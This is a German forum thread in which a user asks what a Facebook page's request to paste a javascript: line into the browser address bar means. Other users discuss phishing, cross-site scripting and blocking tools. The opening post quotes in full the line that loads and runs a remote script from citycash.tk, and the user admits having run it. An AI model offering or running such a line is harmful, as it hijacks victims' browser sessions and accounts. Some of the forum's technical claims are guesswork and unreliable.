Facebook Javascript-Code, was hat es damit auf sich?

[Dschingis Khan]

Guten Abend,

sorry für den Titel, ich wusste nicht wie ich es genau beschreiben sollte.

Diese Seite:
http://www.facebook.com/pages/You-w...-Rhianna-after-watching-video/193333204078776
will einen dazu bringen folgendes in der Adresszeile des Browsers einzugeben (und dann Enter zu drücken):

javascript:(a=(b=document).createElement('script')).src='http://citycash.tk//a.js',b.body.appendChild(a);void(0)

Was hat es damit auf sich? Ist das in irgend einer Weise gefährlich? Ich kenn mich damit nicht wirklich aus und mich interessiert eure Meinung.

Grüße, Dschingis Khan

 

[Crimvel]

Das sieht schwer nach phishing aus

 

[LinuxMcBook]

Ich weiß gerade nicht, ob Browser es zulassen, dass Javascriptcode von anderen Domains auf die aktuelle Seite zugreifen können, aber im schlimmsten Fall bekommt der Betreiber eben wie auch immer gearteten zugriff auf deinen Account. Die a.js oben ist leider teilweise unkenntlich gemacht.

 

[Crimvel]

CrossSiteScriting wird eigentlich nur von plugins wie noscript o.Ä. verhindert

 

[Dschingis Khan]

hm hab dazu noch diese Seite gefunden, die mir aber auch nicht so wirklich weiterhilft...

http://www.blackhatteam.com/f63/hot-script-how-it-can-be-possible-100-200-likes-sec-on-fb-56780.html

peinlicherweise muss ich zugeben auch noch so dumm gewesen zu sein und auf Enter gedrückt zu haben (normalerweise bin ich da aufmerksamer) :/

naja dann sollte ich jetzt wohl sicherheitshalber mein FB PW ändern und überall dort, wo ich das gleiche PW nutze, ebenfalls ändern, wa?

 

[Engaged]

CrossSiteScriting wird eigentlich nur von plugins wie noscript o.Ä. verhindert

jap so siehts aus, mir ist auch nichts anderes bekannt ausser fx addons, darum immer nur mit surfen

 

[DUNnet]

Öh Öh Öh,
Opera hats intigriert, automatisches Weiterleiten deaktiviert - JavaScript deaktiviert - Inhaltsblockierung (nativ) - CrossSite Blockierung!
FireFox Addons, nein wie spaßig